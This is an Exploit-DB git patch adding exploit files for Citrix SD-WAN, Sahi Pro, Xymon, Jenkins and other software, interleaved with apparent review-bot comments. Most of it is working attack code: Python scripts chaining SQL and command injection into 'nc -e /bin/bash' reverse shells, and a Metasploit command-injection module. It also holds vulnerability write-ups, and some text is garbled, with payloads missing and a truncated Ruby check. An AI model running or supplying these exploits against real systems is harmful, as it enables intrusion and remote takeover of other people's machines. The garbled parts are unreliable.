From 978c16266a187766ca23f39f3c1e3c6545e5ab9c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Jul 2019 05:02:17 +0000 Subject: [PATCH] DB: 2019-07-13 9 changes to exploits/shellcodes Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation Xymon 4.3.25 - useradm Command Execution (Metasploit) Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting Sahi Pro 8.0.0 - Remote Command Execution Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes) --- exploits/cgi/webapps/47112.py | 104 +++++++++++++++ exploits/hardware/webapps/47107.txt | 17 +++ exploits/java/webapps/47110.py | 92 ++++++++++++++ exploits/java/webapps/47111.txt | 39 ++++++ exploits/multiple/remote/47114.rb | 188 ++++++++++++++++++++++++++++ exploits/php/webapps/47109.txt | 64 ++++++++++ exploits/windows/dos/47113.txt | 62 +++++++++ exploits/windows/local/47115.txt | 64 ++++++++++ files_exploits.csv | 10 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/47108.txt | 64 ++++++++++ 11 files changed, 704 insertions(+), 1 deletion(-) create mode 100755 exploits/cgi/webapps/47112.py create mode 100644 exploits/hardware/webapps/47107.txt create mode 100755 exploits/java/webapps/47110.py create mode 100644 exploits/java/webapps/47111.txt create mode 100755 exploits/multiple/remote/47114.rb create mode 100644 exploits/php/webapps/47109.txt create mode 100644 exploits/windows/dos/47113.txt create mode 100644 exploits/windows/local/47115.txt create mode 100644 shellcodes/linux_x86/47108.txt 
diff --git a/exploits/cgi/webapps/47112.py b/exploits/cgi/webapps/47112.py
new file mode 100755
index 000000000..30e65008b
--- /dev/null
+++ b/exploits/cgi/webapps/47112.py
@@ -0,0 +1,104 @@
+# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
+# Date: 2019-07-12
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: https://www.citrix.com
+# Product: Citrix SD-WAN
+# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
+# Version: Tested against 10.2.2
+# Tested on:
+# - Vendor-provided .OVA file
+# CVE: CVE-2019-12989, CVE-2019-12991
+#
+# See Also:
+# https://www.tenable.com/security/research/tra-2019-32
+# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
+# https://support.citrix.com/article/CTX251987
+#
+# This code exploits both CVE-2019-12989 and CVE-2019-12991
+# You'll need your own Netcat listener
+
+import requests, urllib
+import sys, os, argparse
+import random
+from OpenSSL import crypto
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+TIMEOUT = 10 # sec
+
+def err_and_exit(msg):
+ print '\n\nERROR: ' + msg + '\n\n'
+ sys.exit(1)
+
+# CVE-2019-12989
+# auth bypass via file write
+def do_sql_injection(base_url):
+ url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
+ headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
+ token = random.randint(10000, 99999)
+ json = {
+ "get_package_file": {
+ "site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
+ "appliance_type" : "primary",
+ "package_type" : "active"
+ }
+ }
+
+ try:
+ r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
+ except requests.exceptions.ReadTimeout:
+ return None
+
+ # error is expected
+ expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
+ if (r.status_code == 400 and r.json() == expected):
+ return token
+ else:
+ return None
+
+# CVE-2019-12991
+# spawns a reverse shell
+def do_cmd_injection(base_url, token, 
ncip, ncport):
+ cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
+ url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
+ success = False
+ try:
+ r = requests.get(url, verify=False, timeout=TIMEOUT)
+ except requests.exceptions.ReadTimeout:
+ success = True
+
+ # a timeout is success. it means we should have a shell
+ return success
+
+##### MAIN #####
+
+desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
+arg_parser = argparse.ArgumentParser(description=desc)
+arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
+arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
+arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
+
+args = arg_parser.parse_args()
+
+print "Starting... be patient. This takes a sec."
+
+# Path to target app
+base_url = 'https://' + args.t
+
+# do sql injection to get a swc-token for auth bypass
+token = do_sql_injection(base_url)
+if (token is None):
+ err_and_exit('SQL injection failed.')
+
+print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
+
+# if this worked, do the command injection
+# create a new admin user and spawn a reverse shell
+success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
+
+if success is False:
+ err_and_exit('Not so sure command injection worked. Expected a timeout.')
+
+print 'Seems like command injection succeeded.'
+print 'Check for your shell!\n'
+print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47107.txt b/exploits/hardware/webapps/47107.txt
new file mode 100644
index 000000000..15b877da8
--- /dev/null
+++ b/exploits/hardware/webapps/47107.txt
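Review bot: `from OpenSSL import crypto`, `urllib` and `os` are imported at the top of 47112.py but never referenced anywhere in the file, so the script carries a pyOpenSSL dependency it does not use; the three names can simply be dropped from the import lines. The comment `# create a new admin user and spawn a reverse shell` above the `do_cmd_injection` call also overstates what that function does — it issues one request and reports a timeout as success, while user creation is only mentioned as a manual command in the final print — so `# spawn a reverse shell; adding an admin user is left as a manual step (see the final print)` would match the code. The header lists the vendor advisory CTX251987 under `# See Also:` but does not record which release fixes the two CVEs, which is the first thing a reader triaging this entry will want; a `# Fixed in:` line citing that advisory would close the gap.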
@@ -0,0 +1,17 @@
+# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
+# Exploit Author: ABDO10
+# Date : July, 11th 2019
+# Product : Tenda D301 v2 Modem Router
+# version : v2
+# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
+# Tested on: Linux
+# CVE : 2019-13491
+
+
+# Poc Instructions :
+/*******************************************************************************************************************/
+> 1 - Open modem router on web browser default(192.168.1.1)
+> 2 - Click on advanced -> Wireless -> Security
+> 3 - fill this payload : as password
+> 4 - Click on "click to display"
+/*******************************************************************************************************************/
\ No newline at end of file
diff --git a/exploits/java/webapps/47110.py b/exploits/java/webapps/47110.py
new file mode 100755
index 000000000..a01820f27
--- /dev/null
+++ b/exploits/java/webapps/47110.py
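Review bot: The header of 47107.txt gives two different identifiers for the same issue — the title says `CVE-2019-13492` while the `# CVE :` line says `2019-13491` — so at least one of them is wrong, and the `# Vendor Homepage:` line points at a TP-Link TD-W8960N page although the product is a Tenda D301 v2. Anyone triaging the archive by CVE or vendor will miss or mis-file this entry; the header should carry a single correct identifier in the `CVE-YYYY-NNNNN` form and the Tenda product page. The `> 3 - fill this payload : as password` step also reads as if the payload text has been lost from the file as committed, which is worth confirming against the original submission.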
@@ -0,0 +1,92 @@
+# Exploit Title: Sahi Pro V8.0.0 - Unauthenticated Remote Command Execution
+# Date: 2019-07-12
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://sahipro.com
+# Software Link: https://sahipro.com/static/builds/pro/install_sahi_pro_v800_20181031.jar
+# Reference: https://pentest.com.tr/exploits/Sahi-Pro-v8-x-Unauthenticated-RCE-Exploit-Python.html
+# Version: 8.0.0
+# Category: Webapps
+# Tested on: Linux 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
+# Description: Sahi allows you to run ".sah" scripts by Sahi Launcher. Also you can create a new script with editor.
+# It is possible to execute commands on the server using the function "_execute()".
+# This exploit creates a new sahi script that runs "netcat" on the server and opens a shell session.
+# It can take 5-20 seconds to receive session.
+# ==================================================================
+# PoC:
+
+#!/usr/bin/python
+
+import sys, requests
+import colorama, random, urllib
+from colorama import Fore
+
+def bannerche():
+ print '''
+ @-------------------------------------------------------------@
+ | Sahi Pro v8.x - Unauthenticated RCE Exploit |
+ | Vulnerability discovered by AkkuS |
+ | My Blog - https://pentest.com.tr |
+ @-------------------------------------------------------------@
+ '''
+bannerche()
+
+def check_nc(rhost,lport):
+ choose = str(raw_input(Fore.RED + "+ [!] Do you listening "+rhost+" "+lport+" with netcat? 
(y/n): "))
+ if choose == "n":
+ return False
+ else:
+ return True
+
+def execute_command(rhost,rport,filename):
+ runuri = "http://"+rhost+":"+rport+"/_s_/sprm/_s_/dyn/Player_setScriptFile"
+ runheaders = {"Connection": "close"}
+ rundata = "dir=%2Froot%2Fsahi_pro%2Fuserdata%2Fscripts%2F&file="+filename+"&starturl=&manual=0"
+ runsah = requests.post(runuri, headers=runheaders, data=rundata)
+
+ if runsah.status_code == 200:
+ print (Fore.GREEN + "+ [*] Script was executed. Please wait for the session...")
+ else:
+ print (Fore.RED + "+ [X] Failed to run script.")
+ sys.exit()
+
+def create_sah(rhost,rport,scdir,lhost,lport):
+
+ filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz0123456789') for i in range(7)) + ".sah"
+ payload = "_execute%28%27nc+"+lhost+"+"+lport+"+-e+%2Fbin%2Fbash%27%29%0A" # it depends I used netcat for PoC
+ sahuri = "http://"+rhost+":"+rport+"/_s_/dyn/pro/EditorUI_saveScript?"+urllib.urlencode({ 'dir' : scdir})+"&file="+filename+"&contents="+payload+""
+ saheaders = {"Connection": "close"}
+ sahreq = requests.get(sahuri, headers=saheaders)
+
+ if sahreq.status_code == 200:
+ print (Fore.GREEN + "+ [*] "+filename+" script created successfully!")
+ execute_command(rhost,rport,filename)
+ else:
+ print (Fore.RED + "+ [X] Failed to create "+filename+" script.")
+ sys.exit()
+
+def main():
+
+ if (len(sys.argv) != 6):
+ print "[*] Usage: poc.py "
+ print "[*] -> Target IP"
+ print "[*] -> Target Port"
+ print "[*] -> Target Script Directory"
+ print "[*] -> Attacker IP"
+ print "[*] -> Attacker Port"
+ print "[*] Example: poc.py 192.168.1.2 9999 /root/sahi_pro/userdata/scripts/ 192.168.1.9 4444"
+ exit(0)
+
+ rhost = sys.argv[1]
+ rport = sys.argv[2]
+ scdir = sys.argv[3]
+ lhost = sys.argv[4]
+ lport = sys.argv[5]
+
+ if not check_nc(rhost,rport):
+ print (Fore.RED + "+ [*] Please listen to the port required for the session and run exploit again!")
+ else:
+ create_sah(rhost,rport,scdir,lhost,lport)
+
+if __name__ == "__main__":
+ 
main()
\ No newline at end of file
diff --git a/exploits/java/webapps/47111.txt b/exploits/java/webapps/47111.txt
new file mode 100644
index 000000000..0ad498026
--- /dev/null
+++ b/exploits/java/webapps/47111.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Persistent XSS - Dependency Graph View Plugin(v0.13)
+# Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# Platform: Java
+# CVE: CVE-2019-10349
+# Jenkins issue: #SECURITY-1177
+
+1. Description:
+The "Display Name" field in General Options of the Configure module in
+Jenkins was found to be accepting arbitrary value which when loaded in the
+Dependency Graph View module gets execute which makes it vulnerable to a
+Stored/Persistent XSS.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10349
+2. Proof of Concept:
+Vulnerable Source
+http://{jenkins-hostname:port}/jobs/{projectname}/configure
+Steps to Reproduce:
+Login to Jenkins Server with valid credentials and ensure that the
+dependency graph plugin is installed.
+1. Click on configure the Jenkins plugin.
+2. Select advanced options
+3. Enter the XSS payload in the "Display Name" field
+4. Navigate to Dependency Graph module
+5. Observe the Executed Payload
+6. Payload used for the demo:
+
+
+
+3. Solution:
+As of publication of this advisory, there is no fix.
+The plugin hsa been abandoned by the maintainer
+
+
+Reference
+https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1177
\ No newline at end of file
diff --git a/exploits/multiple/remote/47114.rb b/exploits/multiple/remote/47114.rb
new file mode 100755
index 000000000..957abf33b
--- /dev/null
+++ b/exploits/multiple/remote/47114.rb
@@ -0,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Xymon useradm Command Execution',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability in Xymon
+ versions before 4.3.25 which allows authenticated users
+ to execute arbitrary operating system commands as the web
+ server user.
+
+ When adding a new user to the system via the web interface with
+ `useradm.sh`, the user's username and password are passed to
+ `htpasswd` in a call to `system()` without validation.
+
+ This module has been tested successfully on Xymon version 4.3.10
+ on Debian 6.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Markus Krell', # Discovery
+ 'bcoles' # Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2016-2056'],
+ ['PACKETSTORM', '135758'],
+ ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
+ ['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'],
+ ['URL', 'https://sourceforge.net/p/xymon/code/7892/'],
+ ['URL', 'https://www.debian.org/security/2016/dsa-3495']
+ ],
+ 'DisclosureDate' => '2016-02-14',
+ 'Platform' => %w(unix linux solaris bsd),
+ 'Targets' =>
+ [
+ [
+ 'Unix CMD',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Payload' => {
+ 'Space' => 2048,
+ 'BadChars' => "\x00\x0A\x0D",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl python netcat php'
+ }
+ }
+ }
+ ],
+ [
+ 'Linux',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86,ARCH_X64],
+ }
+ ],
+ [
+ 'Solaris',
+ {
+ 'Platform' => 'solaris',
+ 'Arch' => [ARCH_X86]
+ }
+ ],
+ [
+ 'BSD',
+ {
+ 'Platform' => 'bsd',
+ 'Arch' => [ARCH_X86, ARCH_X64]
+ }
+ ]
+ ],
+ 
'Privileged' => false,
+ 'DefaultTarget' => 0))
+ register_options([
+ OptString.new('TARGETURI', [
+ true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/'
+ ]),
+ OptString.new('USERNAME', [true, 'The username for Xymon']),
+ OptString.new('PASSWORD', [true, 'The password for Xymon'])
+ ])
+ end
+
+ def user
+ datastore['USERNAME']
+ end
+
+ def pass
+ datastore['PASSWORD']
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
+ 'authorization' => basic_auth(user, pass)
+ })
+
+ unless res
+ vprint_status "#{peer} - Connection failed"
+ return CheckCode::Unknown
+ end
+
+ if res.code == 401
+ vprint_status "#{peer} - Authentication failed"
+ return CheckCode::Unknown
+ end
+
+ if res.code == 404
+ vprint_status "#{peer} - useradm.sh not found"
+ return CheckCode::Safe
+ end
+
+ unless res.body.include?('Xymon')
+ vprint_status "#{peer} - Target is not a Xymon server."
+ return CheckCode::Safe
+ end
+
+ version = res.body.scan(/>Xymon ([\d\.]+)= Gem::Version.new('4.3.25')
+ return CheckCode::Safe
+ end
+
+ CheckCode::Appears
+ end
+
+ def execute_command(cmd, opts = {})
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
+ 'method' => 'POST',
+ 'authorization' => basic_auth(user, pass),
+ 'vars_post' => Hash[{
+ 'USERNAME' => "';#{cmd} & echo '",
+ 'PASSWORD' => '',
+ 'SendCreate' => 'Create'
+ }.to_a.shuffle]
+ }, 5)
+
+ return if session_created? 
+
+ unless res
+ fail_with(Failure::Unreachable, 'Connection failed')
+ end
+
+ if res.code == 401
+ fail_with(Failure::NoAccess, 'Authentication failed')
+ end
+
+ unless res.code == 500
+ fail_with(Failure::Unknown, 'Unexpected reply')
+ end
+
+ print_good "#{peer} - Payload sent successfully"
+
+ res
+ end
+
+ def exploit
+ unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ if payload.arch.first == 'cmd'
+ execute_command(payload.encoded)
+ else
+ execute_cmdstager(linemax: 1_500)
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47109.txt b/exploits/php/webapps/47109.txt
new file mode 100644
index 000000000..4556b8f30
--- /dev/null
+++ b/exploits/php/webapps/47109.txt
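Review bot: The line `version = res.body.scan(/>Xymon ([\d\.]+)= Gem::Version.new('4.3.25')` in `check` is not valid Ruby as shown — it looks as though the end of the regex, the nil check on `version` and the comparison operator were lost when this page was rendered — so the version gate that precedes `return CheckCode::Safe` cannot be reviewed from this hunk; if the committed file really reads like this the module will not load, which is worth confirming against the source. Separately, the module's description (`versions before 4.3.25`) and the comparison against `Gem::Version.new('4.3.25')` treat 4.3.25 as fixed, but the files_exploits.csv entry added later in this commit titles it `Xymon 4.3.25 - useradm Command Execution (Metasploit)`, which reads as if 4.3.25 were affected; `Xymon < 4.3.25 - useradm Command Execution (Metasploit)` would match the module. A small style point: the Linux target's `'Arch' => [ARCH_X86,ARCH_X64],` lacks the space after the comma and carries a trailing comma, unlike the BSD target's `'Arch' => [ARCH_X86, ARCH_X64]`.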
@@ -0,0 +1,64 @@
+# Exploit Title: MyT Project Management - User[username] Stored Cross Site
+Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://manageyourteam.net/index.html
+# Software Link: https://sourceforge.net/projects/myt/files/latest/download
+# Version: 1.5.1
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Software Description : MyT is an extremely powerful project management
+tool, and it's easy to use for both administrators and end-users with a
+really intuitive structure.
+# CVE : CVE-2019-13346
+==================================================================
+
+#Description: "User[username]" parameter has a xss vulnerability. Malicious
+code is being written to database while user is creating process.
+#to exploit vulnerability,add user that setting username as
+"" malicious code.
+
+
+
+POST /myt-1.5.1/user/create HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/myt-1.5.1/user/create
+Content-Type: multipart/form-data;
+boundary=---------------------------1016442643560510919154680312
+Content-Length: 3921
+Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[username]"
+
+
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[password]"
+
+12345
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[password_confirm]"
+
+12345
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[email]"
+
+ad1@gmail.com
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; 
name="User[name]"
+
+
+-----------------------------1016442643560510919154680312
+Content-Disposition: form-data; name="User[surname]"
+
+
+.
+..snip
+..snip
+.
\ No newline at end of file
diff --git a/exploits/windows/dos/47113.txt b/exploits/windows/dos/47113.txt
new file mode 100644
index 000000000..c141923f0
--- /dev/null
+++ b/exploits/windows/dos/47113.txt
@@ -0,0 +1,62 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!ComputeFormat4CmapData:
+
+--- cut ---
+(284c.42b4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!ComputeFormat4CmapData+0x1e5:
+00007fff`aa44d295 41897cc304 mov dword ptr [r11+rax*8+4],edi ds:0000013d`775e8003=????????
+
+0:000> ? r11
+Evaluate expression: 1363507314687 = 0000013d`775e7fff
+
+0:000> ? rax
+Evaluate expression: 0 = 00000000`00000000
+
+0:000> ? 
edi
+Evaluate expression: 1 = 00000000`00000001
+
+0:000> !heap -p -a r11
+ address 0000013d775e7fff found in
+ _DPH_HEAP_ROOT @ 13d77571000
+ in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
+ 13d77572e38: 13d775e7fff 1 - 13d775e7000 2000
+ 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+ 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+ 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+ 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+ 00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+ 00007fffaa44fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+ 00007fffaa448d1d FONTSUB!MergeFormat4Cmap+0x0000000000000261
+ 00007fffaa449788 FONTSUB!MergeCmapTables+0x00000000000004d4
+ 00007fffaa44b046 FONTSUB!MergeFonts+0x00000000000005a6
+ 00007fffaa44baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+ 00007fffaa4414b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+
+0:000> k
+ # Child-SP RetAddr Call Site
+00 0000000c`654fd180 00007fff`aa448e11 FONTSUB!ComputeFormat4CmapData+0x1e5
+01 0000000c`654fd1e0 00007fff`aa449788 FONTSUB!MergeFormat4Cmap+0x355
+02 0000000c`654fd2e0 00007fff`aa44b046 FONTSUB!MergeCmapTables+0x4d4
+03 0000000c`654fd3c0 00007fff`aa44baac FONTSUB!MergeFonts+0x5a6
+04 0000000c`654fd570 00007fff`aa4414b2 FONTSUB!MergeDeltaTTF+0x3ec
+05 0000000c`654fd6b0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+The root cause of the crash seems to be the fact that the MergeFormat4Cmap() function may allocate a 0-sized buffer and pass it to ComputeFormat4CmapData() in the second argument, but the ComputeFormat4CmapData() function assumes that the buffer is at least 8 bytes long, and unconditionally writes two 32-bit values of -1 and 1 into it.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. 
In order to observe the crash, the PageHeap feature must be enabled in Application Verifier for the FontSub client process, preferably with the "/unaligned" and "/size 0 1" options. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47113.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47115.txt b/exploits/windows/local/47115.txt
new file mode 100644
index 000000000..b1cbe455d
--- /dev/null
+++ b/exploits/windows/local/47115.txt
@@ -0,0 +1,64 @@
+VULNERABILITY DETAILS
+It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the
+sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues
+mentioned below with a bug in Chromium to escape its sandbox.
+
+## HTTP -> SMB NTLM reflection
+This is a long known attack that was described, for example, in
+https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was
+supposed to to fix it by blocking attempts to reflect NTLM authentication operating in the same
+machine mode (not sure about the actual internal term for that). However, it's still possible to
+reflect NTLM authentication that works in the regular remote mode, and an attacker can force the
+parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+flag in the initial NEGOTIATE_MESSAGE message.
+
+In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client,
+and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM
+authentication request and considers the `localhost` domain to be safe to automatically log on with
+the current user's credentials. The sandboxed process forwards the corresponding packets to the
+local SMB server.
+
+The problem here is that since the established session is considered remotely authenticated, it's
+not allowed to access administrative shares unless the browser process runs at the high integrity
+level. Therefore, another bug is required to gain file system access.
+
+## Insufficient path check in EFSRPC
+The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to
+manage data objects stored in an encrypted form. It supports backing up and restoring files over
+SMB, among other things. 
Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they
+forbid remote users to pass regular file paths. However, if the attacker passes a UNC path of the
+form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the
+calling user, but this time using the same machine mode authentication; therefore it will be
+permitted to access the C$ share.
+
+The exploit saves the payload on the user's disk (the easiest way might be just to force it to be
+auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the
+user's Startup folder.
+
+There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw`
+accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it
+starts with two back-slashes. Please note that this variant also works in the case where a regular
+user's credentials are relayed to another machine in a domain, so it might have wider security
+implications.
+
+It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the
+same RPC endpoint is available on the `lsass` named pipe with UUID
+[c681d488-d850-11d0-8c52-00c04fd90f7e].
+
+REPRODUCTION CASE
+The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a
+collection of Python classes that supports working with SMB and MSRPC.
+1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server.
+2. Open http://localhost/ in a Chromium-based browser.
+3. You should see a new .exe file appearing on your desktop. 
+
+VERSION
+Microsoft Windows [Version 10.0.17134.648]
+
+REFERENCES
+https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4
+https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47115.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dece5592c..3e592b65a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6506,6 +6506,7 @@ id,file,description,date,author,type,platform,port
 47101,exploits/windows/dos/47101.txt,"Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table",2019-07-10,"Google Security Research",dos,windows,
 47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows,
 47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows,
+47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10586,7 +10587,8 @@ id,file,description,date,author,type,platform,port
 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
 47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
-47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,mark,local,windows,
+47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
+47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
